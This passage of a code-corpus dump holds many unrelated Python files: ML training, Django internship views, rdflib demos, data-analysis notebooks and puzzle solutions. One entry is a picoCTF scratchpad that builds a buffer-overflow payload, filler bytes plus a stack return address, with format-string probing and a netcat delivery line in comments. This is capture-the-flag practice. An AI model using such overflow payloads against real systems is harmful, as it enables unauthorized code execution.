# produced for each.
treatments_names = ['text_blob', 'vader', 'naive_bayes', 'neural_network']
graphics = ["ROC", "visualize_data"]
|
21,929 | 8738067139f2edf611dc93820fb29483fc82a130 | NLP_FRAMEWORK_IP='10.89.100.14'
|
21,930 | 33c14a712c695d7c98ba3761b1580d3cb9c26af1 |
from googleapiclient.discovery import build
def google_search(search_term, api_key, cse_id, **kwargs):
    """Run a Google Custom Search query and return the raw result dict.

    Extra keyword arguments are forwarded to cse().list() (e.g. num, start).
    """
    service = build("customsearch", "v1", developerKey=api_key)
    request = service.cse().list(q=search_term, cx=cse_id, **kwargs)
    return request.execute()
# Multiline blob of sample result URLs (one per line) used for ad-hoc testing.
sampleUrl = '''
https://www.everystudent.com/features/know-God.html
https://www.youtube.com/watch?v=pgmiPXAwiLg
https://www.huffingtonpost.com/steve-mcswain/how-to-find-god-the-five-_b_4660375.html
https://www.ted.com/talks/anjali_kumar_my_failed_mission_to_find_god_and_what_i_found_instead?language=en
https://www.beliefnet.com/faiths/galleries/8-signs-god-is-trying-to-get-your-attention.aspx
https://en.wikipedia.org/wiki/3_Acts_of_God
https://www.imdb.com/title/tt3455338/
https://thelife.com/dont-know-how
https://www.amazon.com/Just-Do-Something-Liberating-Approach/dp/0802458386
https://www.desiringgod.org/articles/why-are-so-many-christians-unhappy
https://en.wikipedia.org/wiki/Theism
https://en.wikipedia.org/wiki/Deism
'''
|
21,931 | 0126c34a746f516ce96b6b4b839ce8126264f2d0 | import re
from itertools import combinations
root = "C:/Users/aiden/Dropbox/git/adventofcode/"
# NOTE(review): the input file is read twice and this first `lines` (plus
# `flatten`) is immediately overwritten/unused below -- leftover scaffolding.
lines = [l.rstrip('\n') for l in open(root + 'day25_input.txt', 'r').readlines()]
flatten = lambda t: [item for sublist in t for item in sublist]
lines = open(root + 'day25_input.txt', 'r').read().split("\n\n")
def encrypt(base, loop):
    """Return base**loop mod 20201227 (AoC 2020 day 25 'transform').

    Uses three-argument pow for O(log loop) modular exponentiation instead
    of the original O(loop) repeated-multiplication loop; identical result
    for every loop >= 0.
    """
    return pow(base, loop, 20201227)
def decrypt(base, target):
    """Brute-force the loop size: the smallest i >= 1 such that
    base**i mod 20201227 equals *target*.  Loops forever if no such i
    exists, exactly like the original."""
    value = 1
    count = 0
    while True:
        value = (value * base) % 20201227
        count += 1
        if value == target:
            return count
# Part 1 answer: transform the card's public key by the door's loop size.
card_loop = encrypt(8790390, decrypt(7, 18499292))
# NOTE(review): the symmetric check below discards its result (it should
# equal card_loop) -- presumably a REPL leftover; confirm intent.
encrypt(18499292, decrypt(7, 8790390))
21,932 | e6d89cec848d9ed6239e705071bf40a6b6d8fe1e | #!/usr/bin/env python
# coding: utf-8
# # Energy Generation
# Imporing libraries
# In[1]:
from entsoe import EntsoePandasClient
import pandas as pd
from plotly.offline import iplot, init_notebook_mode
init_notebook_mode()
import plotly.graph_objs as go
import plotly.figure_factory as ff
import os

# SECURITY fix: a live ENTSO-E API key was previously hard-coded in this
# file (and therefore committed).  Read it from the environment instead;
# the leaked key should be revoked on the ENTSO-E platform.
API_KEY = os.environ.get('ENTSOE_API_KEY', '')

# --- Belgium: total generation, Dec 2017 - Jul 2018 -----------------------
client = EntsoePandasClient(api_key=API_KEY)
start = pd.Timestamp('20171201', tz='Europe/Brussels')
end = pd.Timestamp('20180701', tz='Europe/Brussels')
country_code = 'BE'  # Belgium
# total energy generation
belgium = client.query_generation(country_code, start=start, end=end, psr_type=None)

belgium.tail(10)

# Onshore wind vs solar generation time series.
trace0 = go.Scatter(x=belgium.index, y=belgium['Wind Onshore'], name='Onshore Wind')
trace1 = go.Scatter(x=belgium.index, y=belgium['Solar'], name='Solar')
data = [trace0, trace1]
layout = {'title': 'Belgum Wind energy VS Solar Energy, 2017-2018',
          'xaxis': {'title': 'Date'},
          'yaxis': {'title': 'Energy Generation'}}
iplot({'data': data, 'layout': layout})

# --- Norway: generation forecast, Dec 2017 - Feb 2018 ---------------------
client = EntsoePandasClient(api_key=API_KEY)
start = pd.Timestamp('20171201', tz='Europe/Brussels')
end = pd.Timestamp('20180201', tz='Europe/Brussels')
country_code = 'NO'  # Norway
# total energy generation
norway = client.query_generation_forecast(country_code, start=start, end=end)

norway.head()

trace1 = go.Scatter(x=norway.index, y=norway, name='Solar')
data = [trace1]
layout = {'title': 'Norway Energy Forcast',
          'xaxis': {'title': 'Date'},
          'yaxis': {'title': 'Energy Generation'}}
iplot({'data': data, 'layout': layout})
|
def sortByHeight(a):
    """Sort the people (positive heights) ascending while every tree (-1)
    keeps its original position."""
    tree_spots = [idx for idx, height in enumerate(a) if height == -1]
    people = sorted(height for height in a if height != -1)
    # Re-insert the trees; spots are ascending, so indices stay valid.
    for spot in tree_spots:
        people.insert(spot, -1)
    return people
# Demo: -1 marks trees that must stay in place.
a = [-1, 150, 190, 170, -1, -1, 160, 180]
print(sortByHeight(a))
21,934 | 11dc41571636b31c4bf6250a512e57276a7cc539 | import keras
from keras.models import Model
from keras import backend as K
import matplotlib.pyplot as plt
import h5py
from keras.callbacks import ModelCheckpoint,ReduceLROnPlateau,TensorBoard
from sklearn.model_selection import train_test_split
from sklearn.utils import class_weight
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import pickle
# find class weight
def calculating_class_weights(y_true):
    """Per-label 'balanced' class weights for a multi-label 0/1 matrix.

    y_true: array of shape (n_samples, n_labels) with binary entries.
    Returns an array of shape (n_labels, 2) where weights[i] holds
    (weight for class 0, weight for class 1) of label i.
    """
    from sklearn.utils.class_weight import compute_class_weight
    number_dim = np.shape(y_true)[1]
    weights = np.empty([number_dim, 2])
    for i in range(number_dim):
        # Compatibility fix: compute_class_weight's parameters are
        # keyword-only in scikit-learn >= 0.24; the old positional call
        # raises TypeError there.
        weights[i] = compute_class_weight(class_weight='balanced',
                                          classes=np.array([0., 1.]),
                                          y=y_true[:, i])
    return weights
def get_weighted_loss(weights):
    """Build a class-weighted binary cross-entropy Keras loss.

    weights: array of shape (n_labels, 2); weights[:, 0] applies when the
    target is 0, weights[:, 1] when it is 1.
    """
    def weighted_loss(y_true, y_pred):
        # w0**(1-y) * w1**y selects the per-element weight without branching.
        return K.mean((weights[:,0]**(1-y_true))*(weights[:,1]**(y_true))*K.binary_crossentropy(y_true, y_pred), axis=-1)
    return weighted_loss
#%%
print(K.image_data_format())
# Run identifiers used for checkpoint / log / dataset file names.
model_name = 'downclass1'
data_name = 'traintest3'
filepath='weights/%s.hdf5'%(model_name)
tensorboard = TensorBoard(log_dir='./logs/downclass1', histogram_freq=0,batch_size=128)
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, min_lr=1e-5)
# Checkpoint keeps only improvements in val_loss (mode='min').
checkpoint = ModelCheckpoint('weights/%s.{epoch:02d}-{val_loss:.2f}.hdf5'%(model_name), monitor='val_loss', verbose=0, save_best_only=True, mode='min')
callbacks_list = [checkpoint,tensorboard]#,reduce_lr]
#%%
batch_size = 4
num_classes = 4
epochs = 150
img_size = 256
input_shape = (img_size, img_size, 3)
#%% load test
# Peek at the dataset layout before loading everything into memory.
hf = h5py.File('dataset/%s.h5'%(data_name), 'r')
print(list(hf.keys()))
hf.close()
#%%
with h5py.File('dataset/%s.h5'%(data_name), 'r') as f:
    x_train = f['x_train'][()]
    x_test = f['x_test'][()]
    y_train = f['y_train'][()]
    y_test = f['y_test'][()]
#%% simple model
# VGG-style conv stack with a 1x1 shortcut concatenated back in after two
# stride-2 transposed convolutions; global average pooling plus a sigmoid
# dense layer gives multi-label predictions over num_classes labels.
images = keras.layers.Input(input_shape)
shortcut1 = keras.layers.Conv2D(filters=64, kernel_size=(1, 1), padding="same")(images)
net = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), padding="same")(images)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.MaxPooling2D()(net)
net = keras.layers.Conv2D(filters=128, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=128, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.MaxPooling2D()(net)
net = keras.layers.Conv2D(filters=256, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=256, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=256, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
# Two stride-2 upsamplings restore the 256x256 resolution for the concat.
net = keras.layers.Conv2DTranspose(filters=256, kernel_size=(3, 3),strides=(2,2), padding="same")(net)
net = keras.layers.Conv2DTranspose(filters=256, kernel_size=(3, 3),strides=(2,2), padding="same")(net)
net = keras.layers.concatenate([net,shortcut1], axis=-1)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.Conv2D(filters=512, kernel_size=(3, 3), padding="same")(net)
net = keras.layers.BatchNormalization()(net)
net = keras.layers.Activation("relu")(net)
net = keras.layers.AveragePooling2D((256,256))(net)
net = keras.layers.Flatten()(net)
net = keras.layers.Dense(units=num_classes,activation="sigmoid")(net)
model = keras.Model(inputs=images,outputs=net)
model.summary()
#%%
optimizer = keras.optimizers.Adadelta()
# Balance the per-label losses against class imbalance in y_train.
class_weights= calculating_class_weights(y_train)
model.compile(optimizer= optimizer,
              loss = get_weighted_loss(class_weights)
              )
model.summary()
print(class_weights)
# In[10]:
# Normalise pixels to [0, 1].
x_train = x_train/255.0
x_test = x_test/255.0
print(x_train.min(),x_train.max())
print(x_test.min(),x_test.max())
print(y_train.sum(axis=0))
print(y_test.sum(axis=0))
#%%
history = model.fit(x_train, y_train,
                    batch_size=4,
                    epochs=epochs,
                    validation_data = (x_test, y_test),
                    callbacks=callbacks_list,
                    verbose=1
                    )
# Persist the training history alongside the weights.
with open('weights/%s.pickle'%(model_name), 'wb') as file_pi:
    pickle.dump(history.history, file_pi)
#%%
|
21,935 | a8e19d4e19429b872eb3c2816a17faee19a3d486 | from django.shortcuts import render, redirect
from django.contrib.sites.shortcuts import get_current_site
from intern.reg_no_generator import reg_no_generator
from intern.pdfGenerator import generate_pdf
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.core.mail import send_mail, get_connection
from django.contrib import messages
from intern.forms import *
from intern.models import *
import datetime
from django.utils import timezone
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth import login, authenticate
from django.contrib.auth.models import User
from django.utils.encoding import force_text, force_bytes
from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.template.loader import render_to_string
from django.http import HttpResponse
from wsgiref.util import FileWrapper
import csv, os
from django.conf import settings
from django.contrib.auth.decorators import login_required
from account.decorators import *
from intern.decorators import *
from account import models as a_models
def intern_home(request):
    """Internship section landing page."""
    return render(request,'intern/intern_home.html')
def intern_field(request):
    """Page listing the internship fields on offer."""
    return render(request, 'intern/field_intern.html')
@login_required
def create_profile(request):
    """Create the intern profile for the logged-in user.

    GET shows the empty form; POST validates, attaches request.user to the
    record, saves it and redirects to the activities page.
    """
    if request.method == 'POST':
        form = intern_data_form(request.POST, request.FILES)
        if form.is_valid():
            finalform=form.save(commit=False)
            # Attach the authenticated user before the actual save.
            finalform.user = request.user
            finalform.save()
            return redirect('account:activities')
    else:
        form = intern_data_form()
    return render(request,'intern/create_profile.html',{'form':form})
@login_required
@is_profile_created
def pdf_download(request):
    """Stream the logged-in user's own resume as a PDF attachment."""
    p = profile.objects.get(user=request.user)
    file = p.resume
    # FileWrapper streams the stored file instead of loading it whole.
    response = HttpResponse(FileWrapper(file), content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename=resume.pdf'
    return response
@login_required
@is_profile_created
@is_intern_data_created
def apply_intern(request, intern_choice):
    """Register the logged-in user for the internship ``intern_choice``,
    e-mail a confirmation with the generated registration number, and
    redirect to the activities page.

    Applying twice for the same internship is rejected with an error
    message.  The decorators guarantee a logged-in user with both a
    profile and intern data.
    """
    try:
        intern_choice = str(intern_choice)
    except ValueError:
        raise Http404
    intern_object = intern_code.objects.get(code=intern_choice)
    # A QuerySet .filter() never raises DoesNotExist, so the old
    # try/except around this check was dead code; .exists() is also
    # cheaper than .count() > 0.
    if intern_registration.objects.filter(user=request.user, code=intern_choice).exists():
        messages.error(request, 'You have already applied for '+intern_object.intern)
        return redirect('account:activities')
    regno = reg_no_generator()
    intern_registration_object = intern_registration(user=request.user, code=intern_object, reg_no=regno)
    # Render both plain-text and HTML versions of the confirmation mail.
    plaintext = get_template('intern/email.txt')
    htmly = get_template('intern/email.html')
    profile_obj = a_models.profile.objects.get(user=request.user)
    d = {'name': profile_obj.name, 'intern': intern_object.intern, 'field': intern_object.field, 'regno': regno}
    subject, from_email, to = 'Regards from Team YUVA', 'YUVA<contact@yuva.net.in>', request.user.email
    text_content = plaintext.render(d)
    html_content = htmly.render(d)
    msg = EmailMultiAlternatives(subject, text_content, from_email, [to])
    msg.attach_alternative(html_content, "text/html")
    # send() uses the default mail backend; the previously created but
    # unused get_connection() object was removed.
    msg.send()
    # Persist the registration only after the mail went out successfully.
    intern_registration_object.save()
    messages.success(request, 'You have successfully applied for '+intern_object.intern+' internship in '+intern_object.field+' field.')
    return redirect('account:activities')
@login_required
@is_manager
def view_reg(request):
    """List every user together with profile, intern data and all
    internship registrations (manager-only)."""
    user_set = User.objects.all()
    total_list = []
    for u in user_set:
        try:
            p = a_models.profile.objects.get(user=u)
            a_data = intern_data.objects.get(user=u)
            i = intern_registration.objects.filter(user=u)
            data_dict = {'p': p, 'i': i, 'e': u.email, 'n': u.username, 'a': a_data}
            total_list.append(data_dict)
        except (a_models.profile.DoesNotExist, intern_registration.DoesNotExist, intern_data.DoesNotExist) as e:
            # Users with incomplete data are silently skipped.
            # NOTE(review): .filter() never raises DoesNotExist, so only
            # the two .get() calls can actually trigger this handler.
            pass
    return render(request,'intern/list.html', {'list':total_list})
@login_required
@is_manager
def download_list(request):
    """Export every applicant as a CSV attachment (manager-only).

    One row per user with a complete profile and intern data; all of the
    user's internship registrations are folded into one delimited column.
    """
    user_set = User.objects.all()
    total_list = []
    for u in user_set:
        try:
            p = a_models.profile.objects.get(user=u)
            a_data = intern_data.objects.get(user=u)
            i = intern_registration.objects.filter(user=u)
            # Bug fix: the dict used to also contain 's': s although `s`
            # was never assigned (its lookup was commented out), which
            # raised NameError on the first complete user.
            data_dict = {'p': p, 'i': i, 'e': u.email, 'n': u.username, 'a': a_data}
            total_list.append(data_dict)
        except (a_models.profile.DoesNotExist, intern_registration.DoesNotExist, intern_data.DoesNotExist):
            # Users with incomplete data are skipped.
            pass
    # 'text/csv' is the registered MIME type; 'application/csv' is not.
    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = 'attachment; filename=list.csv'
    wr = csv.writer(response)
    wr.writerow(['Date', 'Name', 'Email', 'Phone', 'Gender', 'College', 'Course', 'Username', 'Resume', 'Resume Link', 'Days', 'From', 'To', 'SOP', 'Intern'])
    for l in total_list:
        # Concatenate every registration into a single delimited field.
        intern = ''
        for li in l['i']:
            intern = intern + li.code.intern + ' - ' + li.code.field + ' - ' + li.reg_no + '|######|'
        wr.writerow([
            l['a'].updated_at, l['p'].name, l['e'], l['p'].phone,
            l['a'].gender, l['p'].college, l['a'].course, l['n'],
            l['a'].resume,
            'https://yuva.net.in/intern/resume_download/' + str(l['p'].user.id),
            l['a'].days, l['a'].from_date, l['a'].to_date, l['a'].sop, intern,
        ])
    return response
@login_required
@is_manager
def resume_download(request,path):
    """Download the resume of the user whose primary key is `path`
    (manager-only).

    NOTE(review): `path` is used directly as a user id; a non-numeric or
    unknown value raises an uncaught exception (HTTP 500) instead of 404.
    """
    user_obj = User.objects.get(id = path)
    p = profile.objects.get(user = user_obj)
    file = p.resume
    response = HttpResponse(FileWrapper(file), content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename=resume.pdf'
    return response
|
"""Scratchpad for a stack-buffer-overflow exploit (picoCTF 'gauntlet').

Builds a payload of 120 filler bytes followed by a little-endian stack
address and copies it to the clipboard for pasting into gdb / the target
binary.  The commented lines are earlier format-string and offset-hunting
experiments, kept for reference.
"""
import os
import pyperclip

# Earlier format-string probing:
# for i in range(5):
#     payload = "%" + str(i) + "\$s \x30\xeb\xff\xff\xff\x7f"
#     # payload = "%3\$x \x30\xeb\xff\xff\xff\x7f"
#     # payload = "%x"*20 + "BBAACCDD"
#     payload = "A"*500
#     os.system('echo ' + payload + ' | ./gauntlet')
#     os.system('echo ""')

# Notes from the gdb sessions:
# 118-120
# break *0x0000000000400727
# break *0x00000000004006bc
# 0x7fffffffdb10
# payload = "A"*120 + "BBBBBB"

# 120 bytes of padding, then the little-endian stack address to return to.
payload = "A"*120 + "\x10\xdb\xff\xff\xff\x7f"
pyperclip.copy(payload)
# os.system('./gauntlet')
print(payload)
# print("break *0x000000000040074e")
# print("r")
# os.system('echo ' + payload + ' | nc mercury.picoctf.net 11022')
# 7fffffffeb30
# 41414141414242
# \x30\xeb\xff\xff\xff\x7f
# for ((i = 1; i < 200; i++)); do ./gauntlet; echo "BBAAAACC%$i\$x"; done | grep 4141
# for ((i = 1; i < 200; i++)); do echo -n "$i " && ./gauntlet && echo "" && echo "BBAAAACC%$i\$x"; done | grep 4141
# XYZDCBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# Bug fix: the file used to end with a bare keyboard-mash identifier,
# which raised NameError as soon as the script reached it:
# asdlkfjsldkjflskdjflksjdlfkkjbafdkjghdsiluhgoihfiunlmdfndgohdikjrnelkfhjuiobfgsdjfoihsbfoqeifjio8wejflksdfjoishejwenofin
|
"""rdflib walkthrough: build a small FOAF graph and exercise the common
query helpers (subjects/predicates/objects, triples, value,
preferredLabel) before serializing to RDF/XML.

Bug fix: the script mixed Python-2 print statements (``print mbox``)
with Python-3 calls and therefore did not parse on Python 3; all prints
were converted to print() calls.
"""
from rdflib import Graph, BNode, Literal, URIRef
from rdflib import RDF, RDFS
from rdflib.namespace import FOAF, DC, XSD

g = Graph()
donna = BNode()
bob = BNode()

# Add triples using the store's add method.
g.add((donna, RDF.type, FOAF.Person))
# NOTE(review): "foo" is not a valid language tag; recent rdflib
# versions may warn about or reject it.
g.add((donna, FOAF.nick, Literal("donna", lang="foo")))
g.add((donna, FOAF.name, Literal("Donna Fales")))
g.add((donna, FOAF.mbox, URIRef("mailto:donna@example.org")))

for s, p, o in g:
    print(s, p, o)

# For each foaf:Person in the store print out its mbox property.
print("--- printing mboxes ---")
for person in g.subjects(RDF.type, FOAF.Person):
    for mbox in g.objects(person, FOAF.mbox):
        print(mbox)

# Bind a few prefix, namespace pairs for more readable output
g.bind("dc", DC)
g.bind("foaf", FOAF)

# g.subjects(p, o) / g.predicates(s, o) / g.objects(s, p)
for s in g.subjects(None, None):
    print(s)
for p in g.predicates(donna, None):
    print(p)
for o in g.objects(donna, None):
    print(o)
print('~~~~~~~~~~~~~~~~~')
print(g.subject_objects(None))
print('~~~~~~~~~~~~~~~~~')
print(g.predicate_objects(None))

# g.triples((s, p, o)) iterates over matching triples
for s, p, o in g.triples((donna, RDF.type, FOAF.Person)):
    print(s, p, o)

# g.value(s, p) returns a single matching object
name = g.value(donna, FOAF.name)
print(name)

# RDFS.label / SKOS preferred-label behaviour
from rdflib import ConjunctiveGraph, URIRef, RDFS, Literal
from rdflib.namespace import SKOS
from pprint import pprint

g = ConjunctiveGraph()
u = URIRef(u'http://example.com/foo')
g.add([u, RDFS.label, Literal('foo')])
g.add([u, RDFS.label, Literal('bar')])
pprint(sorted(g.preferredLabel(u)))
g.add([u, SKOS.prefLabel, Literal('bla')])
pprint(g.preferredLabel(u))
g.add([u, SKOS.prefLabel, Literal('blubb', lang='en')])
sorted(g.preferredLabel(u))
pprint(g.preferredLabel(u))
pprint(g.preferredLabel(u))
g.add([u, SKOS.prefLabel, Literal('blubb', lang='en')])
sorted(g.preferredLabel(u))
g.preferredLabel(u, lang='')
pprint(g.preferredLabel(u, lang='en'))

g.serialize("test6.rdf", format="xml")
|
"""Magnitude-based weight pruning for a trained HAPT CNN.

Loads a trained Keras model, reports its train accuracy, zeroes out 50%
of the weights of every weight-carrying layer except the first
convolution, records the binary pruning masks, and stores the
compressed weights.  Earlier experiment code (training loop,
post-pruning fine-tuning, test-set evaluation) had been commented out
and was removed for readability.
"""
from copy import deepcopy
import numpy as np
from HAPT import split_HAPT
from compression import prune_weights, save_compressed_weights
from keras.models import load_model
from numpy.random import seed
from sklearn.metrics import accuracy_score

# Hyper-parameters of the pruning run.
batch_size = 32
fine_tune_epochs = 30  # NOTE(review): unused here; the fine-tuning code was commented out
pca_dims = 20

# Load the (PCA-reduced) HAPT splits; labels come in as 1..12.
X_train, X_test, y_train, y_test = split_HAPT.main(pca_dims)
y_train = y_train - 1  # shift labels to 0-based for the argmax comparison

masks = {}        # layer index -> binary mask of the kept weights
layer_count = 0
moderated = str(50)
model_path = 'model/' + moderated + 'Hz/' + 'pca_testing_bigger_cnn' + str(pca_dims) + '.hdf5'
model = load_model(model_path)

# Baseline train accuracy before pruning.
pred_train = model.predict(np.expand_dims(X_train, axis=2), batch_size=32)
accuracy = (accuracy_score(y_train, np.argmax(pred_train, axis=1)))
print(accuracy)

seed(2020)
# do not compress the first convolution layer
first_conv = True
for layer in model.layers:
    weight = layer.get_weights()
    print(len(weight))
    if len(weight) >= 2:  # only layers that carry kernel + bias
        if not first_conv:
            w = deepcopy(weight)
            # Zero the 50% smallest-magnitude kernel weights, keep the mask.
            tmp, mask = prune_weights(w[0], compress_rate=0.5)
            masks[layer_count] = mask
            w[0] = tmp
            layer.set_weights(w)
        else:
            first_conv = False
    # NOTE(review): indentation was lost in this copy of the file;
    # layer_count is assumed to advance once per layer so that `masks`
    # lines up with model.layers indices used by the fine-tuning code.
    layer_count += 1

n_classes = 12
# Convert labels to a one-hot encoding (used by the fine-tuning code).
y_train_dynamic_oh = np.eye(n_classes)[y_train]

# Save the pruned model weights in compressed form.
compressed_name = 'compressed_true_0.9_bigs'
save_compressed_weights(model, compressed_name)
|
21,939 | 56bb3f98de7ac828f0a298ebd8bd010bb57509b1 | import math
class Config:
    """Static configuration tables: shape formulas plus material and
    coating unit prices."""

    # Each shape maps to the ordered dimension names its formulas expect,
    # plus callables computing its volume and total surface area.
    SHAPES = {
        'cylinder': {
            'dimensions': ['height', 'radius'],
            'volume_func': lambda height, radius: math.pi * radius * radius * height,
            'area_func': lambda height, radius: 2 * math.pi * radius * (radius + height),
        },
        'cone': {
            'dimensions': ['height', 'radius'],
            'volume_func': lambda height, radius: math.pi * radius * radius * height / 3,
            'area_func': lambda height, radius: math.pi * radius * (radius + math.sqrt(height * height + radius * radius)),
        },
        'cuboid': {
            'dimensions': ['length', 'breadth', 'height'],
            'volume_func': lambda length, breadth, height: length * breadth * height,
            'area_func': lambda length, breadth, height: 2 * (length * breadth + breadth * height + length * height),
        },
    }

    # Price per unit of raw material.
    MATERIALS = {
        'iron': {'price': 2},
        'steel': {'price': 1},
    }

    # Price per unit of surface coating.
    COATINGS = {
        'gold': {'price': 1000},
        'silver': {'price': 100},
        'copper': {'price': 10},
    }
class DevConfig(Config):
    # Development configuration: inherits everything from Config unchanged.
    pass


class TestConfig(Config):
    # Enables test mode for the hosting framework.
    TESTING = True


class ProdConfig(Config):
    # Production configuration: make sure debugging is off.
    DEBUG = False


# Registry mapping an environment name to its configuration class.
configs = {
    'development': DevConfig,
    'testing': TestConfig,
    'production': ProdConfig
}
|
# coding: utf-8
"""Compare terminal lists: report every entry of testlist.txt that also
appears (as a substring) in a line of VPN_RJ1.txt and count the matches.

Fixes: the user-facing Portuguese strings were mojibake (UTF-8 decoded
with the wrong codec, e.g. "ANГЃLISE"); the reference file was reopened
once per input line; neither file was ever closed.
"""
from datetime import datetime

now = datetime.now()

print('INICIANDO A ANÁLISE DE DADOS...')
print('Este procedimento requer alguns minutos, por favor aguarde!')
print('')
print('')

total = 0
# Read the reference file once instead of reopening it for every record.
with open('VPN_RJ1.txt', 'r') as vpn_file:
    vpn_lines = [line.rstrip() for line in vpn_file]

# Open the file with the records to search for.
with open('testlist.txt', 'r') as data:
    for linha in data:
        linha = linha.rstrip()
        for linha2 in vpn_lines:
            if linha in linha2:
                total = total + 1
                print('Este terminal é comum no GOL2 e GOL3 ' + linha)

print('')
print('O total de terminais comuns encontrados foi')
print(total)
print('')
print('ANÁLISE CONCLUÍDA COM SUCESSO!')
|
21,941 | 885edb12340b45d173d757bb04397e4db3f64e7e | # This software is Copyright (c) 2015 The Regents of the University of
# California. All Rights Reserved. Permission to copy, modify, and distribute this
# software and its documentation for academic research and education purposes,
# without fee, and without a written agreement is hereby granted, provided that
# the above copyright notice, this paragraph and the following three paragraphs
# appear in all copies. Permission to make use of this software for other than
# academic research and education purposes may be obtained by contacting:
#
# Office of Innovation and Commercialization
# 9500 Gilman Drive, Mail Code 0910
# University of California
# La Jolla, CA 92093-0910
# (858) 534-5815
# invent@ucsd.edu
#
# This software program and documentation are copyrighted by The Regents of the
# University of California. The software program and documentation are supplied
# "as is", without any accompanying services from The Regents. The Regents does
# not warrant that the operation of the program will be uninterrupted or
# error-free. The end-user understands that the program was developed for research
# purposes and is advised not to rely exclusively on the program for any reason.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST
# PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF
# THE UNIVERSITY OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE. THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN "AS
# IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATIONS TO PROVIDE
# MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
from grip.common import ACTIVE_MAX_PFX_EVENTS, ACTIVE_MAX_EVENT_ASES, ACTIVE_MAX_PROBES_PER_TARGET
class TracerouteMetrics:
    """Metrics and extra information collected for each event
    (traceroute worthiness, selection counters, request counters)."""

    def __init__(self,
                 max_pfx_events=ACTIVE_MAX_PFX_EVENTS, max_event_ases=ACTIVE_MAX_EVENT_ASES, max_vps_per_event_as=ACTIVE_MAX_PROBES_PER_TARGET,
                 tr_worthy=False, tr_worthy_tags=None, tr_skipped=False, tr_skip_reason="",
                 selected_vp_cnt=0, selected_unique_vp_cnt=0, total_event_as_cnt=0, selected_event_as_cnt=0,
                 tr_worthy_pfx_event_cnt=0, selected_pfx_event_cnt=0,
                 tr_request_cnt=0, tr_request_failure_cnt=0,
                 ):
        # thresholds
        self.max_pfx_events = max_pfx_events  # how many prefix events are we willing to trace per event?
        # NOTE(review): the original comments repeated the line above for
        # the two fields below; judging by their names and defaults they
        # bound the event ASes per event and the probes (VPs) per event
        # AS — confirm against grip.common.
        self.max_event_ases = max_event_ases
        self.max_vps_per_event_as = max_vps_per_event_as

        # event-level flags and counters
        self.tr_worthy = tr_worthy
        self.tr_skipped = tr_skipped
        if tr_worthy_tags is None:
            tr_worthy_tags = []
        # Tags are stored as a set of tuples so tag groups are hashable
        # and deduplicated.
        self.tr_worthy_tags = set()
        for tags in tr_worthy_tags:
            self.tr_worthy_tags.add(tuple(tags))
        self.tr_skip_reason = tr_skip_reason
        self.selected_vp_cnt = selected_vp_cnt
        self.selected_unique_vp_cnt = selected_unique_vp_cnt
        self.total_event_as_cnt = total_event_as_cnt
        self.selected_event_as_cnt = selected_event_as_cnt

        # pfx_event-level counters
        self.tr_worthy_pfx_event_cnt = tr_worthy_pfx_event_cnt
        self.selected_pfx_event_cnt = selected_pfx_event_cnt
        self.tr_request_cnt = tr_request_cnt
        self.tr_request_failure_cnt = tr_request_failure_cnt

    def update_tags(self, pfx_events):
        """Collect the worthy-tags of every traceroute-worthy prefix event."""
        for e in pfx_events:
            if e.traceroutes["worthy"]:
                self.tr_worthy_tags.add(tuple(e.traceroutes["worthy_tags"]))

    @staticmethod
    def from_dict(d):
        """Rebuild a TracerouteMetrics from a dict of constructor kwargs."""
        return TracerouteMetrics(**d)
|
21,942 | ba50cac4ca57263bbdc01bc75f391a3a5f33712d | from __future__ import division
import operator
import math
from collections import OrderedDict
import textwrap
from collection import *
from nlp import *
import csv
def getTfDoc(list_of_terms):
    """Build/extend the corpus term-frequency index.

    Fills `list_of_terms` as term -> {doc_id: frequency} by tokenizing
    every document.  Relies on the module-level globals
    `list_of_filenames`, `sub_dir` and `ids`, and on the project helpers
    `getDocument` and `nlp`.  Returns the (mutated) mapping.
    """
    for filename in list_of_filenames:
        data = getDocument(filename, sub_dir)
